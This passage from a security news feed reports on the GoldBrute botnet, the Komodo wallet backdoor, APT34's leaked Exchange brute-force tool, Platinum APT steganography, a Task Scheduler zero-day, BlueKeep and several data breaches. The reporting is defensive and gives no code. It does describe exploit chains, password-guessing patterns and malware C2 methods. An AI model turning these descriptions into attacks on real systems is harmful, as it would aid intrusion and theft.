“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”

goldbrute botnet map

The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.

The report published by Marinho also includes a list of IoCs.

Pierluigi Paganini

(SecurityAffairs – GoldBrute botnet, hacking)

The post New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers appeared first on Security Affairs.

Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers

The Cryptocurrency startup Komodo hacked itself to protect the funds of its users and avoid that hackers steal them exploiting a flaw in its Agama wallet.

The story I’m going to tell you is amazing, the Cryptocurrency startup Komodo hacked itself after discovered a backdoor in its Agama wallet.

Komodo’s Agama Wallet allows users to store KMD and BTC cryptocurrencies, but the presence of a backdoor posed a serious risk to them.

Komodo Agama Wallet 1

Once discovered the flaw, the company decided to exploit it to protect the funds, anticipating the hackers and moving them to a secure location.

“Today, Komodo were made aware of an issue with one of the libraries used by the Agama wallet, potentially putting some user funds at risk.” reads a blog post published by the company.

“After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk.” 

The experts at the company moved around 8 million KMD and 96 BTC from its Agama flawed wallets to safe wallets RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF(KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC) under their control.

The owners of those wallets that have not been swept, or that have other assets than KMD and BTC, have to move all their funds from Agama to a new address as soon as possible. Komodo provided a list of safe wallets and other information on its support page.

Experts pointed out that the Verus version of Agama wallet is not affected by this vulnerability, its latest version supports Komodo in both lite mode and native mode.

The backdoor in the Agama wallet app was discovered by experts at the security team of the npm JavaScript package repository.

“The attack was carried out by using a pattern that is becoming more and more popular; publishing a “useful” package (electron-native-notify) to npm, waiting until it was in use by the target, and then updating it to include a malicious payload.” reads the post published by the npm, Inc. security team.

Npm security team spotted a supply chain attack, hackers used a malicious update for the electron-native-notify (version 1.1.6) JavaScript library. It included a malicious code designed to steal cryptocurrency wallet seeds and other login passphrases.

“The GitHub user sawlysawly published this commit on Mar 8th which added electron-native-notify^1.1.5 as a dependency to the EasyDEX-GUI application (which is used as part of the Agama wallet).” continues the security team at npm.

The experts discovered that the attackers targeted the Agama cryptocurrency wallet which was using the EasyDEX-GUI application that was loading the now-malicious electron-native-notify library.

The backdoor was added to the electron-native-notify library on March 8, and it was included in the main Agama wallet on April 13, when Komodo released Agama version 0.3.5.

This means that users that logged in to any version of Agama wallet after 13 April likely had their wallet credentials compromised.

The npm experts also published a video that shows how the vulnerable version of Agama wallet sends the private seed associated with a waller to a remote server in the background.

Komodo experts used the same technique to transfer the funds of the company clients to a safe wallet before hackers could have stolen them.

Pierluigi Paganini

(SecurityAffairs – Komodo, hacking)

The post Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers appeared first on Security Affairs.

The EU’s Embassy In Moscow Was Hacked and Kept It Secret

A “sophisticated cyber espionage event” began in February 2017. Russian entities are said to be behind piracy, a source told BuzzFeed News.

The European Union embassy in Moscow was compromised and information was stolen, according to an internal document leaked by BuzzFeed News.

An ongoing “sophisticated cyber espionage event” was discovered in April, just weeks before the European Parliament elections – but the European External Action Service (EEAS), the EU’s foreign and security policy agency, did not disclose the incident publicly.

The Russian entities would be behind the attack, a source who spoke on condition of anonymity told BuzzFeed News.

The EEAS confirmed the occurrence of a cyber-attack and asked if the EU foreign policy officer Federica Mogherini was aware of the incident and stated that the EEAS hierarchy had been informed. “We have observed potential signs of compromised systems connected to our unclassified network in our Moscow Delegation. Measures have been taken and the investigation is in progress — at this stage we cannot comment further,” a spokesperson said.

According to the leaked document, the initial attack took place in February 2017 but was detected only in April this year. An analysis of hack revealed an activity involving at least two computers and concluded that the information had been stolen.

However, officials have no idea about the type of information gathered during the attack. The analysis determined that cyber espionage hacking was an Advanced Persistent Threat (APT) – a continuous, clandestine and sophisticated hacking technique used to gain access to a system and remain undetected for a long period of time.

According to this leaked document, these types of attacks are tried against other European foreign affairs ministries. The source that reported to BuzzFeed News about Russian groups were behind the hacking of the EEAS in Moscow, also confirmed that member states were not informed of the incident.

But the EEAS spokesman said that member states were informed: “through established channels (cyber defense channels)”.

In view of the May European Parliament elections, the EU has taken a series of measures to combat cyber attacks, including an action plan against misinformation, including evidence of ongoing aggression and interference on the part of foreign actors, mainly Russia.

According to BuzzFeed News, some officials claim that the bloc and some European governments are not doing enough to thwart Russian activity because they underestimate or downplay the threat.

In his only public statement as a special advisor last month, Robert Mueller said his investigation into Russia’s interference in the 2016 elections revealed that “Russian intelligence officers in the Russian military launched a concerted attack on our political system.” He used sophisticated computer techniques to hack computers and networks used by the Clinton campaign. ”

He concluded that there were “multiple systematic efforts to interfere in our elections”.

The same group that hacked the Democratic National Committee was also behind a hacking against the German parliament the previous year.

Related Blogs:

China Accused of Hacking Campaign by US and UK

Australian Healthcare Sector, the Favorite Target of Cyber Attacks

Common Hacking Techniques and Best Prevention Strategies

The post The EU’s Embassy In Moscow Was Hacked and Kept It Secret appeared first on .

VMware addressed flaws in its Workstation and Tools

VMware has informed its users that it has patched two high-severity vulnerabilities that affect its Tools and Workstation software.

VMware has patched two high-severity flaws that affect its Tools and Workstation software.

The first security flaw, tracked as CVE-2019-5522, affects VMware Tools 10.x on Windows. The vulnerability is an out-of-bounds read issue in the vm3dmp driver in Windows guest machines, it was reported by the researchers ChenNan and RanchoIce of Tencent ZhanluLab

“VMware Tools update addresses an out of bounds read vulnerability in vm3dmp driver which is installed with vmtools in Windows guest machines.  VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.1.” reads the advisory published by VMware.

“A local attacker with non-administrative access to a Windows guest with VMware Tools installed may be able to leak kernel information or create a denial of service attack on the same Windows guest machine,”

The company addressed the vulnerability with the release of the version 10.3.10, unfortunately, no workarounds are available.

The second issue, tracked as CVE-2019-5525, is a use-after-free bug affecting the Advanced Linux Sound Architecture (ALSA) backend in Workstation 15.x. The vulnerability could be exploited by an attacker with normal user privileges on the guest machine to execute arbitrary code on the underlying Linux host. Chaining the issue with another vulnerability it is possible to execute arbitrary code.

“VMware Workstation contains a use-after-free vulnerability in the Advanced Linux Sound Architecture (ALSA) backend. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.5.” states the advisory.

“A malicious user with normal user privileges on the guest machine may exploit this issue in conjunction with other issues to execute code on the Linux host where Workstation is installed.”

The company addressed this vulnerability with the release of the Workstation 15.1.0 for Linux. The vulnerability, rated as “high severity,” was reported by Brice L’helgouarc’h from Amossys.

Pierluigi Paganini

(SecurityAffairs – hacking)

The post VMware addressed flaws in its Workstation and Tools appeared first on Security Affairs.

Remote code execution flaw in Ministra IPTV Platform exposes user data and more

Researchers at security firm CheckPoint have discovered multiple critical vulnerabilities in a popular IPTV middleware platform.

Security experts at CheckPoint have discovered multiple critical flaws in a popular IPTV middleware platform that is used by more than a thousand online media streaming services to manage their millions of subscribers.

Ministra TV platform is a PHP-based middleware platform for media streaming services, it manages Internet Protocol television (IPTV), video-on-demand (VOD) and over-the-top (OTT) content, licenses and their subscribers.

In order to receive the television broadcast, the set-top boxes (STB) connects to the Ministra and service providers use the platform to manage their customers.

The vulnerabilities affect the administrative panel of the Ministra TV platform (former Stalker Portal), it could be exploited by an attacker to bypass authentication access to information associated with subscribers.

Another scaring aspect of the discovery is that an attacker could exploit the flaws to broadcast and stream its content on the devices of the affected networks.

The platform is developed by the Ukrainian company Infomir, most of the providers that use are located in the United States (199), following with Netherlands (137), Russia (120), France (117) and Canada (105).

ipvt platform Ministra flaws

“About a year ago Check Point Research discovered critical vulnerabilities in a Ukrainian TV streaming platform that, if exploited, could leave service providers exposed to a serious breach.” states a blog post published by Check Point. “The risks would be their entire customer database of personal info and financial details as well as allowing an attacker to potentially stream any content they choose on to the screens of their customer network.

CheckPoint researchers discovered a logical vulnerability in an authentication process implemented by the Ministra platform. A function used to authenticate users fails to validate the request, allowing a remote attacker to bypass authentication and perform SQL injection by exploiting a separate vulnerability.

“[ Ministra] It is PHP based, and like most web-based platforms, it has an admin interface that requires authentication.” continues the experts. “However, we were able to bypass the authentication mechanism and utilize some of the admin AJAX API functions. This lead to SQL Injection chained to PHP Object Injection vulnerabilities, effectively allowing us to remotely execute code on the server. “

The experts also demonstrated in a video PoC that it is possible to chain the flaws with a PHP Object Injection issue to remotely execute arbitrary code on the targeted server.

“In this particular case, we used the authentication bypass to perform an SQL Injection on the server,” continues the post. “With that knowledge, we escalated this issue to an Object Injection vulnerability, which in turn allowed us to execute arbitrary code on the server, potentially impacting not only the provider but also the provider’s clients.”

The security experts reported the flaws to the company, that addressed them with the release of Ministra version 5.4.1.

Pierluigi Paganini

(SecurityAffairs – Ministra, hacking)

The post Remote code execution flaw in Ministra IPTV Platform exposes user data and more appeared first on Security Affairs.

Cisco disclosed several flaws in Cisco Industrial Network Director

Cisco disclosed several flaws in its CISCO Industrial Network Director product, including a high severity code execution vulnerability.

Cisco employees discovered several vulnerabilities in CISCO Industrial Network Director product, including a high severity code execution flaw.

The Cisco Industrial Network Director is used to manage industrial networks, it helps operations teams gain full visibility into the automation network for improved system availability and increase overall equipment effectiveness

Three flaws were discovered during an internal security testing, the most serious one tracked as CVE-2019-1861 is a remote code execution vulnerability that received a CVSS score of 7.2.

CISCO Industrial Network Director

“A vulnerability in the software update feature of Cisco Industrial Network Director could allow an authenticated, remote attacker to execute arbitrary code.” reads the security advisory published by Cisco.

“The vulnerability is due to improper validation of files uploaded to the affected application. An attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.”

The flaw could be exploited by an authenticate attacker to the target system with admin privileges and upload any malicious file, then execute arbitrary code with elevated privileges.

The security hole has been patched with the release of version 1.6.0. Prior versions are impacted.

Another flaw discovered in the Industrial Network Director is a stored cross-site scripting (XSS) tracked as CVE-2019-1882. The flaw, rated as medium severity, can be exploited remotely by an authenticated attacker to carry out XSS attacks,

“A vulnerability in Cisco Industrial Network Director could allow an authenticated, remote attacker to conduct stored cross-site scripting (XSS) attacks.” reads the Cisco Advisory.

“The vulnerability is due to improper validation of content submitted to the affected application. An attacker could exploit this vulnerability by sending requests containing malicious values to the affected system. A successful exploit could allow the attacker to conduct XSS attacks.”

The third flaw is a cross-site request forgery (CSRF) flaw that could be exploited by an unauthenticated attacker to perform arbitrary actions on the targeted device.

The flaw tracked as CVE-2019-1881 has been rated as medium severity.

“A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.” reads the advisory.

“The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device.”

Pierluigi Paganini

(SecurityAffairs – CISCO, hacking)

The post Cisco disclosed several flaws in Cisco Industrial Network Director appeared first on Security Affairs.

Platinum APT and leverages steganography to hide C2 communications

The Platinum cyber espionage group uses steganographic technique to hide communications with the Command and Control Servers  (C&C).

Experts from Kaspersky have linked the Platinum APT group with cyber attacks involving an elaborate, and new steganographic technique used to hide communications with C2 servers.

The APT group was discovered by Microsoft in 2016, it targeted organizations in South and Southeast. According to Microsoft, the Platinum has been active since at least 2009, it was responsible for spear phishing attacks on ISPs, government organizations, intelligence agencies, and defense institutes.

The hackers don’t appear to be financially motivated due to the nature of targeted entities and TTPs of the group.

In June 2018, experts at Kaspersky were investigating attacks against government and military entities in South and Southeast Asian countries,

The experts tracked the campaign as EasternRoppels, they speculate it may have started as far back as 2012.

“In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels.” reads the analysis published by the expert. “The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.”

The attack chain starts with WMI subscriptions to run an initial PowerShell downloader and fetch another small PowerShell backdoor for system fingerprinting and downloading additional code. 

The initial WMI PowerShell scripts observed in different attacks were using different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption and different active hours.

Threat actor located the C&C addresses on free hosting services, they used a large number of Dropbox accounts for storing the malicious code and store exfiltrated data.

Kaspersky spotted a backdoor while investigating another threat, further analysis allowed its experts to discover that it was a second stage malware used in one of the Platinum campaigns.

“We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc.” continues Kaspersky.

The researchers discovered that in the two attacks, it was used the same domain to store exfiltrated data. The analysis of the encrypted files used in the second stage revealed a previously undiscovered backdoor associated with the Platinum group. 

Hackers used a dropper to install the steganography backdoor, the malicious code creates directories for the backdoor and saves backdoor-related files in these folders. Then the dropper runs the backdoor, implements a persistence mechanism, and then removes itself. 

Once the backdoor is installed on a target machine, it will connect to C&C server and downloads an HTML page that contains embedded commands that are encrypted with a key that is also embedded into the page.

“The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <–1234567890> tag (see below). ” continues the analysis.

Platinum

One of the steganography techniques used by the threat actors is based on the principle that HTML is indifferent to the order of tag attributes. The malicious code is able to decode line by line and collects an encryption key for the encoded data that are embedded in the page right after the HTML tags. Data are encoded with a second steganography technique.

The backdoor supports several commands, it could upload, download and execute files, handle requests for lists of processes and directories, upgrade and uninstall itself, and change the configuration file. 

The analysis also revealed another tool used as a configuration manager that allows creating configuration and command files for the backdoors. The utility is able to configure more than 150 options.

Experts also discovered a P2P backdoor that has many similarities with the previous one, it uses the same command names and the same names of options in the configuration files. 

“However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.” continues the analysis.

The backdoor is able to sniff network traffic without keeping any socket in listening mode, it creates a listening socket every time someone attempts to connect.

According to the experts, the backdoor might have been active since at least 2012. 

“We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier.” concludes Kaspersky. ” Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active. “

Pierluigi Paganini

(SecurityAffairs – PLATINUM APT, hacking)

The post Platinum APT and leverages steganography to hide C2 communications appeared first on Security Affairs.

Analyzing the APT34’s Jason project

Security expert Marco Ramilli has analyzed the recently leaked APT34 hacking tool tracked as Jason – Exchange Mail BF.

Today I want to share a quick analysis on a new leaked APT34 Tool in order to track similarities between APT34 public available toolsets. This time is the APT34 Jason – Exchange Mail BF project to be leaked by Lab Dookhtegan on June 3 2019.

Original Leak

Context

According to FireEye, APT34 has been active since 2014. APT 34, also referred to as “OilRig” or Helix Kitten, has been known to target regional corporations and industries. Although there was information about APT34 prior to 2019, a series of leaks on the website Telegram by an individual named “Lab Dookhtegan”, including Jason project, exposed many names and activities of the organization.

“APT34 conducts cyber espionage on behalf of Iran. Iran seeks to diminish the capabilities of other regional powers to create leverage and better establish itself. This strategy is especially important against nations it sees as a threat to its regional power such as Saudi Arabia and the United Arab Emirates.”

Michael Lortz

Analysis

Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container (a copy is available here) the interface is quite intuitive: the Microsoft exchange address and its version shall be provided (even if in the code a DNS-domain discovery mode function is available). Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected (included in the distributed ZIP file) and threads number should be provided in order to optimize the attack balance.

Jason Project GUI

Deflating the ZIP container three artifacts are facing out. Jason.exe representing the graphic user interface and the main visible tool. Microsoft.Exchange.WebService.dll which includes the real functionalities used by Jason.exe, it’s a Microsoft developed library, PassSamplewhich includes some patterns implementation of possible Passwords (ie.[User@first]@@[user@first]123) and a folder named PasswordPatterswhich includes building blocks for password guessing. For example it wraps up a file called Year.txt including numbers from 1900 to 2020, a file called numspecial.txt including special numbers patterns and special chars patterns, a file called num4.txt including numbers from 0 to 999 and from 0002 (why not 0001 or 0000?) to 9998 (why not 9999?) and finally a file called num4special.txt including special number patters like: 1234,7890,0707, and so on and so forth.

Leaked ZIP content

Digging a little bit into the two Microsoft artifacts we might find out that both of them ( Jason.exe and Microsoft.Exchange.WebService.dll) have been written using .NET framework. The used .dll provides a managed interface for developing .NET client applications that use EWS. By using the EWS Managed API, the developer can access almost all the information stored in an Office 365, Exchange Online, or Exchange Server mailbox. The attacker used an old version of Microsoft.Exchange.WebService.dll tagged as 15.0.0.0 which according to Microsoft documentation dates back to 2012.

WebService.dll assemply version

The last available Microsoft.Exchange.WebService.dll dates back to 2015, as shown in the following image, which might suggest a Jason dating period, even if it’s not an irrefutable evidence.

Last Microsoft Exchange WebServices dll version dates to 2015

Analyzing the reversed byte-code a real eye catcher (at least in my persona point of view) is in the “exception securities” that have been placed. In other words, the developer used many checks such as: variable checks, Nullbytes avoidance, objects indexes and object key checks in order to reduce the probability of not managed software exceptions. These “exception protections” are usually adopted in two main scenarios: (i) the end-user is not a super “techy” guy, so he might end-up with some unexpected conditions or (ii) the attacker is a professional developer who is trained to write product oriented code and not simple working software (which is what attackers usually do). The following images show a couple of code snippets in where the developer decided to protect codes from unexpected user behavior.

Basic exception prevention 1
Basic exception prevention 2

Comparing the code style with my previous analyses on APT34 (OilRig) which you might find here and here, we might observe a similar code protection. Even if the code language is different the similarity in the basic exception prevention from Jason and -for example- the “ICAP.py script injection” function is very close. Another weak similarity is in the logging style. Jason and -for example- Glimpse project have a similar file logging function which includes string concatenation using special operators (no “flying casting” or “safe conversions”, ie: “%s”) and one line file logging into function focal points.

I am aware that these are weak similarities and there is no additional evidence or ties with previous leaked APT34 except for the trusted source (Lab Dookhtegan), so I am not giving any personal attribution since it gets very hard to attribute Jason directly to APT34 for what is known.

On the other hand Jason project doesn’t share the main source code language with previous APT34 analyses, it doesn’t include DNS tricks and or DNS usage evidences, it doesn’t include distinguishing patterns or language mistakes, it have been recompiled on January 2019 but using older technology. As already discussed it shares just few code style similarities with Glimpse and WebMask.

Additional technical details, including Yara Rules and IoCs, are reported in the original analysis published by Marco Ramilli on his blog:

https://marcoramilli.com/2019/06/06/apt34-jason-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Jason, APT34)



The post Analyzing the APT34’s Jason project appeared first on Security Affairs.

0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day

Experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

Security experts at 0patch released an unofficial patch to address a recently disclosed zero-day vulnerability in Windows 10 Task Scheduler. 

A couple of weeks ago, researcher SandboxEscaper released a working exploit for the vulnerability, Like the Windows zero-day disclosed in August, this new issue affects Microsoft Windows Task Scheduler.

SandboxEscaper demonstrated that is possible to trigger the Windows zero-day by using malformed legacy tasks (.JOB format) and importing them in the Task Scheduler utility. and they can still be added to newer versions of the operating system.

Every JOB file is imported by the Task Scheduler with arbitrary DACL (discretionary access control list) control rights.

The experts pointed out that in the absence of the DACL, the system grants any user full access to the file.

The researcher explained that in order to trigger the flaw it is necessary to import legacy task files into the Task Scheduler on Windows 10.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

“Microsoft Windows contains a privilege escalation vulnerability in the way that theTask Scheduler SetJobFileSecurityByName() function is used, which can allow an authenticated attacker to gain SYSTEM privileges on an affected system.” wrote Dormann.

Dormann was able to reproduce the issue Recompiling the code on 64-bit Windows 10 and Windows Server 2016 and 2019, only on Windows 8 and 7 it was not possible to reproduce it.

“We have confirmed that the public exploit code functions reliably on 32- and 64-bit Windows 10 platforms, as well as Windows Server 2016 and Windows Server 2019.” continues Dormann. “While Windows 8 still contains this vulnerability, exploitation using the publicly-described technique is limited to files where the current user has write access, in our testing,”

According to experts at 0patch, only legacy schtasks.exe can be abused to escalate privileges. Unlike legacy schtasks.exe, the modern Task Scheduler would require the user setting the task to modify a file to have write permissions to that file. 

“After some head-scratching, we remembered that this attack only works with the legacy schtasks.exe, and not with the new one. Could it be that the old schtasks.exe was calling some other RPC function than _SchSetRpcSecurity, which then in turn called _SchSetRpcSecurity via RPC?” reads the analysis published by 0patch.

Task Manager, zero-day

The researchers discovered that the process, which runs with attacker privileges, calls RPC endpoint taskcomp!SASetAccountInformation in Task Scheduler’s process svchost.exe (running as Local System), which in turn calls RPC endpoint schedsvc!_SchRpcSetSecurity in the same svchost.exe (still running as Local System). 

Experts discovered that taskcomp.dll has Local System privileges and impersonates self (Local System) to enable the SeRestorePrivilege privilege that is needed for it to set DACL and ownership on any file.

we believe it was actually an error to impersonate self in taskcomp.dll instead of impersonating the client. The latter would in fact allow the security check in schedsvc!_SchRpcSetSecurity to perform correctly and work as intended on a regular file as well as on a hard-linked system file (correctly failing when invoked by a low-privileged user).” continues 0patch.

“We therefore decided to replace self-impersonation with client-impersonation, and to do that, we removed the call to ImpersonateSalfWithPrivilege and injected a call to RpcImpersonateClient in its place.”

Unfortunately, the exploit was still working because another RPC call was made to SchRpcSetSecurityin taskcomp.dll when the first RPC call fails. Then the experts at 0patch completely removed the call to SetSecurity. 

“After that, we got the desired behavior: The legacy schtasks.exe was behaving correctly when creating a new task from a job file, and […] the hard link trick no longer worked because the Task Scheduler process correctly identified the caller and determined that it doesn’t have sufficient permissions to change DACL or ownership on a system file,” continues 0patch. 

0patch released a micropatch to address the vulnerability on all Windows 10 systems running the 0patch Agent. Researchers explained that the micropatch does not modify schedsvc.dll, this means that non-legacy Task Scheduler is not affected. 

“As always, if you have 0patch Agent installed and registered, this micropatch is already on your computer – and applied to taskcomp.dll in your Task Scheduler service. If you don’t have the 0patch Agent yet, you can register a 0patch account and install it to get this micropatch applied.” concludes 0patch.

“Following our guidelines on which patches to provide for free, this micropatch affects many home and education users, and is therefore included in both FREE and PRO 0patch license until Microsoft provides an official fix. After that the micropatch will only be included in the PRO license.”

The micropatch released 0patch works on fully updated:

  1. Windows 10 version 1809 32bit
  2. Windows 10 version 1809 64bit
  3. Windows Server 2019

Pierluigi Paganini

(SecurityAffairs – Task Scheduler, zero-day)

The post 0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day appeared first on Security Affairs.

NSA urges Windows Users and admins to Patch BlueKeep flaw

The National Security Agency (NSA) is urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

Last week Microsoft issued a second security advisory to warn users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

Now the National Security Agency (NSA) is also urging Windows users and administrators to install security updates to address BlueKeep flaw (aka CVE-2019-0708).

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Security experts believe it is a matter of time before threat actors will start exploiting it in the wild. A few hours ago, the esecurity researcher Zǝɹosum0x0 announced to have has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows ” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”

BlueKeep NSA

In addition to installing the patches from Microsoft, Windows users can mitigate attacks:

  • Block TCP Port 3389 at your firewalls, especially any perimeter firewalls exposed to the internet. This port is used in RDP protocol and will block attempts to establish a connection.
  • Enable Network Level Authentication. This security improvement requires attackers to have valid credentials to perform remote code authentication.
  • Disable remote Desktop Services if they are not required. Disabling unused and unneeded services helps reduce exposure to security vulnerabilities overall and is a best practice even without the BlueKeep threat.

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post NSA urges Windows Users and admins to Patch BlueKeep flaw appeared first on Security Affairs.

Tens of Million patients impacted by the AMCA data breach

Outsourced silos of personal info raided, at least 200,000 payment details swiped

Recovery agency for patient collections American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers.

American Medical Collection Agency (AMCA) suffered a data breach that could impact many of its customers, the company still hasn’t disclosed details.

filing with the U.S. Securities and Exchange Commission (SEC) Quest revealed that the attackers broke into the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.

AMCA databreach

The security breach has impacted roughly 12 million of Quest Diagnostics‘ patients and roughly 7.7 of LabCorp patients. After the disclosure of the incident, Labcorp announced the terminations of business activities with AMCA and Quest Diagnostics has suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

“LabCorp has referred approximately 7.7 million consumers to AMCA whose data was stored in the affected AMCA system. AMCA’s affected system included information provided by LabCorp.” reads the Form 8-K filing.

“That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance). LabCorp provided no ordered test, laboratory results, or diagnostic information to AMCA.”

AMCA confirmed that Social Security Numbers and insurance identification information are maintained for LabCorp consumers.

AMCA also informed LabCorp that it is sending security breach notices to approximately 200,000 LabCorp consumers whose financial data may have been compromised.

According to DataBreaches.net, stolen data are already fueling dark web, in fact researchers at Gemini Advisory, discovered the offer of payment card information for roughly 200,000 individuals likely from AMCA’s databases.

“The breach had been discovered by Gemini Advisory, who informed this site that they had found approximately 200,000 patients’ payment card info for sale on a well-known marketplace. The cards had apparently been compromised between September, 2018 and the beginning of March, 2019.” states DataBreaches.net.

Pierluigi Paganini

(SecurityAffairs – American Medical Collection Agency, hacking)

The post Tens of Million patients impacted by the AMCA data breach appeared first on Security Affairs.

The Australian National University suffered a major, sophisticated attack

The Australian National University suffered a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The Australian National University was the victim of a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The top Australian university is known for its intense collaboration with Australia’s government and the national security services.

The university has estimated that over 200,000 people have been affected by the security breach. Vice-chancellor Brian Schmidt sent a message to the staff and students to notify them of the incident, he explained that threat actors illegally accessed the university’s systems in late 2018.

“We believe there was unauthorised access to significant amounts of personal staff, student and visitor data extending back 19 years,” Schmidt said. “We have no evidence that research work has been affected,”

“In late 2018, a sophisticated operator accessed our systems illegally. We detected the breach two weeks ago,”

Schmidt also added that exposed data included names, addresses, dates of birth, phone numbers, personal email addresses and emergency contact details, tax file numbers, payroll information, bank account details, passport details, and student academic records.

Financial data, medical records, police checks, workers’ compensation, vehicle registration numbers have not been affected.

The Australian National University reported the incident to the authorities and it partners and is currently investigating the attack with their support.

“We’re working closely with Australian government security agencies and industry security partners to investigate further.” added Schmidt.

“The University has taken immediate precautions to further strengthen our IT security and is working continuously to build on these precautions to reduce the risk of future intrusion.”

Universities are a privileged target for hackers, especially nation-state actors interested in spying on advanced research projects.

In June 2018, Chinese hackers breached into the systems of the Australian National University (ANU) and according to the experts they remained in its infrastructure also after the discovery of the intrusion.

This time the authorities haven’t attributed the intrusion to a specific actor, but the events suggest the involvement of a sophisticated cyberespionage group.

Australian entities were hit by several major attacks in the last years, in February, hackers broke into Australia’s Parliament Computer Network and this is just the last hack in order of time.

in October 2016 a report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

